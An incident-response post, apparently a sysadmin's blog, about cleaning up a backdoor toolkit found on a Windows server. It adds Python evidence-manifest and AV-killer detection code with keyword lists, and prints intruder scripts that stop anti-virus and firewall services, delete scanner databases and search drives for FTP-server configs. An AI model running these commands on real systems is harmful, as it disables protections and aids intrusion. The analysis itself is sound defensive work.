First thing this morning, when I switched on, I found Host Monitor reporting a problem with the Web Server: "SQL Server No Answer". I remoted into the machine, and AVG's scheduled scan reported that Secure.bat in C:\WINNT\SYSTEM32\SPOOL\HELP had a virus. Following that up, I found that C:\WINNT\SYSTEM32\SPOOL\ had one more hidden directory than usual, Help. So, the way police officer BaiBai does it, I took a snapshot of the scene with Alt+Print Screen, then packed up the Help directory, deleted it, and wrote the incident into the server operations log. Unfortunately the trigger, Secure.bat, got deleted right away; next time a problem turns up, the scene has to be preserved before anything is cleaned up.
Looking at the contents of Help (listed below), it is mostly about gathering information, plus a Telsrv program, fully in the spirit of Sun Tzu's "know yourself and know your enemy, and you will not be defeated in a hundred battles":
AV_FW.bat: stops the services of all sorts of anti-virus products and firewalls such as BlackICE, and at the end also deletes the scan history and the virus database files;
Fport.exe: collects port information, including the process listening on each port, and saves the result to Fport.txt;
regedit.exe: the registry editor;
kill.exe: PsKill v1.03 - local and remote process killer;
system.bat: reports system information and looks for Serv-U, saving the result to Systeminfo.txt;
telsrv.exe: a Telnet Server, http://www.pcmicro.com/netfoss/telsrv.html;
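The lesson drawn above, preserve the scene before cleaning up, is easy to script. The following is an added example, not code from the original post: it walks a suspicious directory read-only, hashes every file and records size, timestamps and the hidden attribute into a JSON manifest, so that the trigger file is still documented even after it has been deleted or quarantined. The directory layout and file contents in build_sample_dir() are constructed for the demonstration and are not the real Help directory.

```python
"""Evidence manifest for a suspicious directory, written before anything is
deleted. Added example (not code from the original post). Paths and sample
file contents are hypothetical."""
import hashlib
import json
import os
import stat
import tempfile
import time
from pathlib import Path


def sha256_file(path: Path, chunk: int = 1 << 16) -> str:
    """Stream the file through SHA-256 so large binaries never sit in memory."""
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_hidden(path: Path) -> bool:
    """FILE_ATTRIBUTE_HIDDEN on Windows (st_file_attributes exists only there);
    elsewhere fall back to the dot-file convention."""
    attrs = getattr(path.stat(), "st_file_attributes", 0)
    hidden_flag = getattr(stat, "FILE_ATTRIBUTE_HIDDEN", 0x2)
    return bool(attrs & hidden_flag) or path.name.startswith(".")


def _iso(ts: float) -> str:
    return time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime(ts))


def collect_evidence(root: str) -> list:
    """Return one record per regular file under root, sorted by relative path.
    Nothing is opened for writing; the only side effect is a possible atime
    update on filesystems that do that on read (image the disk if that matters)."""
    root_path = Path(root)
    records = []
    for path in sorted(p for p in root_path.rglob("*") if p.is_file()):
        st = path.stat()
        records.append({
            "path": path.relative_to(root_path).as_posix(),
            "size": st.st_size,
            "mtime": _iso(st.st_mtime),
            "ctime": _iso(st.st_ctime),
            "hidden": is_hidden(path),
            "sha256": sha256_file(path),
        })
    return records


def write_manifest(root: str, out_file: str) -> int:
    """Write the JSON manifest (keep it next to the packed copy of the
    directory, not inside it); returns the number of files recorded."""
    records = collect_evidence(root)
    manifest = {
        "collected_at": _iso(time.time()),
        "root": os.path.abspath(root),
        "files": records,
    }
    with open(out_file, "w", encoding="utf-8") as fh:
        json.dump(manifest, fh, indent=2)
    return len(records)


def build_sample_dir() -> str:
    """Constructed sample: a stand-in for the spool\\Help directory with two
    files whose contents are placeholders, not the real malware."""
    root = tempfile.mkdtemp(prefix="evidence_")
    help_dir = Path(root) / "Help"
    help_dir.mkdir()
    (help_dir / "AV_FW.bat").write_bytes(b"abc")
    (help_dir / "Fport.txt").write_bytes(b"")
    return root


if __name__ == "__main__":
    sample = build_sample_dir()
    n = write_manifest(sample, sample + "-manifest.json")
    print(f"{n} files recorded in {sample}-manifest.json")
```

Run the manifest before packing the directory, and pack the manifest together with the archive; the SHA-256 values are what an AV vendor or a colleague can later match against, regardless of what happened to the live copy.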
Since this server was one I had taken over, and it is an All in One server, I went through it step by step:
※ Using Secure.bat as the keyword, I found on Google a Symantec security bulletin on Backdoor.Sumtax: http://securityresponse.symantec.com/avcenter/venc/data/backdoor.sumtax.html; I checked the places it describes and cleaned up the registry;
※ Went through the services again and shut down everything that was not needed (I still wonder how so many odd services came to be enabled);
※ Used %SystemRoot%\system32\wupdmgr.exe to get fully patched from Microsoft's site;
※ Changed the SQL Server SA password, renamed the local Administrator account and changed its password too, and recorded this in the server operations report;
※ Killed all suspicious processes, and checked the following keys, cutting out every suspicious entry:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
Contents of AV_FW.bat:
:: Stop every AV / firewall service on the list; /y answers the dependency prompt
net stop _Avp32.exe /y >> av_fw.txt
net stop _Avpcc.exe /y >> av_fw.txt
net stop _Avpm.exe /y >> av_fw.txt
net stop Ackwin32.exe /y >> av_fw.txt
net stop Agnitum Outpost Firewall /y >> av_fw.txt
net stop Anti-Trojan.exe /y >> av_fw.txt
net stop ANTIVIR /y >> av_fw.txt
......
net stop AVCONSOL /y >> av_fw.txt
net stop WEBTRAP /y >> av_fw.txt
net stop POP3TRAP /y >> av_fw.txt
:: Then wipe scanner databases and integrity checklists from the whole drive
del c:\*ANTI-VIR*.DAT /s /q >> av_fw.txt
del c:\*CHKLIST*.DAT /s /q >> av_fw.txt
del c:\*CHKLIST*.MS /s /q >> av_fw.txt
del c:\*CHKLIST*.CPS /s /q >> av_fw.txt
del c:\*CHKLIST*.TAV /s /q >> av_fw.txt
......
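A script like AV_FW.bat is easy to spot statically: a long run of net stop against security products, then recursive deletes of scanner data. The following is an added example, not code from the original post: a small batch-file analyzer that extracts stopped services, taskkill targets and recursive deletions and gives a verdict. The keyword lists are an assumption (a starting point, not a product catalogue), and the sample script at the bottom is constructed to resemble the listing above.

```python
"""Static check of a batch file for the AV/firewall-killer pattern. Added
example, not from the original post; keyword lists and sample are assumptions."""
import re

# Assumption: fragments of AV / firewall service names worth alerting on.
AV_KEYWORDS = ("avp", "avg", "antivir", "anti-trojan", "outpost", "blackice",
               "norton", "symantec", "mcafee", "kaspersky", "zonealarm",
               "avconsol", "webtrap", "pop3trap", "ackwin")
# Assumption: name fragments of scanner databases / integrity checklists.
AV_DATA_KEYWORDS = ("anti-vir", "chklist", "avp", "vbase", "virscan")

_NET_STOP = re.compile(r"^\s*net\s+stop\s+(.*?)(?:\s+/y)?\s*(?:>.*)?$", re.I)
_SC_STOP = re.compile(r"^\s*sc\s+(?:stop|delete)\s+(\S+)", re.I)
_TASKKILL = re.compile(r"^\s*taskkill\b.*?/im\s+(\S+)", re.I)
_DEL = re.compile(r"^\s*(?:del|erase)\s+(\S+)\s*(.*)$", re.I)


def _hits(name: str, keywords) -> bool:
    low = name.lower()
    return any(k in low for k in keywords)


def analyze_batch(text: str) -> dict:
    """Walk the script line by line; return what it stops, kills and deletes,
    plus a verdict. Only plain command lines are understood (no variable
    expansion, no call/for constructs), which is all this family uses."""
    report = {"stopped": [], "av_stopped": [], "killed": [],
              "recursive_deletes": [], "av_data_deletes": [], "verdict": ""}
    for line in text.splitlines():
        m = _NET_STOP.match(line) or _SC_STOP.match(line)
        if m:
            svc = m.group(1).strip()
            report["stopped"].append(svc)
            if _hits(svc, AV_KEYWORDS):
                report["av_stopped"].append(svc)
            continue
        m = _TASKKILL.match(line)
        if m:
            report["killed"].append(m.group(1))
            continue
        m = _DEL.match(line)
        if m:
            target = m.group(1)
            # flags sit before any output redirection
            flags = set(re.findall(r"/(\w)", m.group(2).split(">")[0].lower()))
            if "s" in flags:
                report["recursive_deletes"].append(target)
            if _hits(target, AV_DATA_KEYWORDS):
                report["av_data_deletes"].append(target)
    # Verdict: several security services stopped, or one stopped plus its
    # data files wiped, is the AV-killer signature.
    if len(report["av_stopped"]) >= 3 or (report["av_stopped"] and report["av_data_deletes"]):
        report["verdict"] = "av-killer"
    else:
        report["verdict"] = "no av-killer pattern"
    return report


# Constructed sample in the style of AV_FW.bat (not the real file).
SAMPLE_BATCH = r"""@echo off
net stop _Avp32.exe /y >> av_fw.txt
net stop Agnitum Outpost Firewall /y >> av_fw.txt
net stop ANTIVIR /y >> av_fw.txt
net stop Spooler /y >> av_fw.txt
taskkill /f /im blackice.exe
del c:\*CHKLIST*.DAT /s /q >> av_fw.txt
del c:\*ANTI-VIR*.DAT /s /q >> av_fw.txt
del c:\temp\build.log /q
"""

if __name__ == "__main__":
    r = analyze_batch(SAMPLE_BATCH)
    print(r["verdict"])
    print("AV services stopped:", r["av_stopped"])
    print("AV data wiped:", r["av_data_deletes"])
```

Point it at every .bat/.cmd found in the evidence copy; a hit is also a reminder that the scanner on the box cannot be trusted to have seen anything after the script ran, since its databases were removed.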
Contents of system.bat:
@echo off
echo System Information: > Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
:: OPERATING SYSTEM
echo ___________________ >> Systeminfo.txt
echo Operating System... >> Systeminfo.txt
echo. >> Systeminfo.txt
VER >> Systeminfo.txt
:: FREE SPACE ("libres" matches the French "octets libres" line of dir, so the script was presumably written on a French Windows)
echo _____________ >> Systeminfo.txt
echo Free Space... >> Systeminfo.txt
echo. >> Systeminfo.txt
dir c: | find "bytes" >> Systeminfo.txt
dir c: | find "libres" >> Systeminfo.txt
dir d: | find "bytes" >> Systeminfo.txt
dir d: | find "libres" >> Systeminfo.txt
dir e: | find "bytes" >> Systeminfo.txt
dir e: | find "libres" >> Systeminfo.txt
dir f: | find "bytes" >> Systeminfo.txt
dir f: | find "libres" >> Systeminfo.txt
dir g: | find "bytes" >> Systeminfo.txt
dir g: | find "libres" >> Systeminfo.txt
dir h: | find "bytes" >> Systeminfo.txt
dir h: | find "libres" >> Systeminfo.txt
:: FINDING SERVU (Serv-U config and binary, for stealing FTP accounts or reusing the server)
echo ________________ >> Systeminfo.txt
echo Finding Servu... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\Ser*.ini >> Systeminfo.txt
Dir /s /a d:\Ser*.ini >> Systeminfo.txt
Dir /s /a e:\Ser*.ini >> Systeminfo.txt
Dir /s /a c:\Ser*.exe >> Systeminfo.txt
Dir /s /a d:\Ser*.exe >> Systeminfo.txt
Dir /s /a e:\Ser*.exe >> Systeminfo.txt
:: FINDING rar
echo ________________ >> Systeminfo.txt
echo Finding RAR.. >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\*.rar >> Systeminfo.txt
Dir /s /a d:\*.rar >> Systeminfo.txt
Dir /s /a e:\*.rar >> Systeminfo.txt
Dir /s /a f:\*.rar >> Systeminfo.txt
Dir /s /a g:\*.rar >> Systeminfo.txt
Dir /s /a h:\*.rar >> Systeminfo.txt
:: FINDING mp3
echo ________________ >> Systeminfo.txt
echo Finding MP3... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\*.mp3 >> Systeminfo.txt
Dir /s /a d:\*.mp3 >> Systeminfo.txt
Dir /s /a e:\*.mp3 >> Systeminfo.txt
Dir /s /a f:\*.mp3 >> Systeminfo.txt
Dir /s /a g:\*.mp3 >> Systeminfo.txt
Dir /s /a h:\*.mp3 >> Systeminfo.txt
:: FINDING nfo
echo ________________ >> Systeminfo.txt
echo Finding NFO... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\*.nfo >> Systeminfo.txt
Dir /s /a d:\*.nfo >> Systeminfo.txt
Dir /s /a e:\*.nfo >> Systeminfo.txt
Dir /s /a f:\*.nfo >> Systeminfo.txt
Dir /s /a g:\*.nfo >> Systeminfo.txt
Dir /s /a h:\*.nfo >> Systeminfo.txt
:: FINDING FTP.EXE
echo ________________ >> Systeminfo.txt
echo Finding FTP... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\FTP.EXE >> Systeminfo.txt
Dir /s /a d:\FTP.EXE >> Systeminfo.txt
Dir /s /a e:\FTP.EXE >> Systeminfo.txt
Dir /s /a f:\FTP.EXE >> Systeminfo.txt
Dir /s /a g:\FTP.EXE >> Systeminfo.txt
Dir /s /a h:\FTP.EXE >> Systeminfo.txt
:: FINDING TFTP.EXE
echo ________________ >> Systeminfo.txt
echo Finding TFTP... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\TFTP.EXE >> Systeminfo.txt
Dir /s /a d:\TFTP.EXE >> Systeminfo.txt
Dir /s /a e:\TFTP.EXE >> Systeminfo.txt
Dir /s /a f:\TFTP.EXE >> Systeminfo.txt
Dir /s /a g:\TFTP.EXE >> Systeminfo.txt
Dir /s /a h:\TFTP.EXE >> Systeminfo.txt
:: FINDING FIREDAEMON.EXE (service wrapper, used to keep a dropped program running as a service)
echo ________________ >> Systeminfo.txt
echo Finding Firedaemon... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a d:\FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a e:\FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a f:\FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a g:\FIREDAEMON.EXE >> Systeminfo.txt
Dir /s /a h:\FIREDAEMON.EXE >> Systeminfo.txt
:: FINDING IOFTPD
echo ________________ >> Systeminfo.txt
echo Finding Ioftpd... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\io*.ini >> Systeminfo.txt
Dir /s /a d:\io*.ini >> Systeminfo.txt
Dir /s /a c:\io*.exe >> Systeminfo.txt
Dir /s /a d:\io*.exe >> Systeminfo.txt
Dir /s /a c:\rai*.ini >> Systeminfo.txt
Dir /s /a d:\rai*.ini >> Systeminfo.txt
Dir /s /a c:\rai*.exe >> Systeminfo.txt
Dir /s /a d:\rai*.exe >> Systeminfo.txt
:: FINDING Sub0t.ini
echo ________________ >> Systeminfo.txt
echo Finding Sub0t.ini... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\Sub0t.ini >> Systeminfo.txt
Dir /s /a d:\Sub0t.ini >> Systeminfo.txt
Dir /s /a e:\Sub0t.ini >> Systeminfo.txt
Dir /s /a c:\svrany.exe >> Systeminfo.txt
Dir /s /a d:\svrany.exe >> Systeminfo.txt
:: FINDING ftpc.exe
echo ________________ >> Systeminfo.txt
echo Finding ftpc.exe... >> Systeminfo.txt
echo. >> Systeminfo.txt
Dir /s /a c:\ftpc.exe >> Systeminfo.txt
Dir /s /a d:\ftpc.exe >> Systeminfo.txt
Dir /s /a e:\ftpc.exe >> Systeminfo.txt
Dir /s /a f:\ftpc.exe >> Systeminfo.txt
Dir /s /a g:\ftpc.exe >> Systeminfo.txt
Dir /s /a h:\ftpc.exe >> Systeminfo.txt
:: RUNNING SERVICES
echo ___________________ >> Systeminfo.txt
echo Running Services... >> Systeminfo.txt
echo. >> Systeminfo.txt
NET START >> Systeminfo.txt
:: ENVIRONMENT VARIABLES
echo ______ >> Systeminfo.txt
echo SET... >> Systeminfo.txt
echo. >> Systeminfo.txt
SET >> Systeminfo.txt
:: INSTALLED SOFTWARE (export the Uninstall key, keep only the DisplayName lines)
echo _____________________ >> Systeminfo.txt
echo Installed Software... >> Systeminfo.txt
echo. >> Systeminfo.txt
Start /Wait Regedit /E %TEMP%\Tmp HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
Find "DisplayName" %TEMP%\Tmp >> Systeminfo.txt
Del %TEMP%\Tmp
:: NETSTAT
echo ___________ >> Systeminfo.txt
echo NET STAT... >> Systeminfo.txt
echo. >> Systeminfo.txt
NETSTAT >> Systeminfo.txt
:: RUNNING PROCESSES
echo ____________________ >> Systeminfo.txt
echo Running Processes... >> Systeminfo.txt
echo. >> Systeminfo.txt
TASKLIST /SVC >> Systeminfo.txt
:: SYSTEM INFO
echo ______________ >> Systeminfo.txt
echo System Info... >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt
echo. >> Systeminfo.txt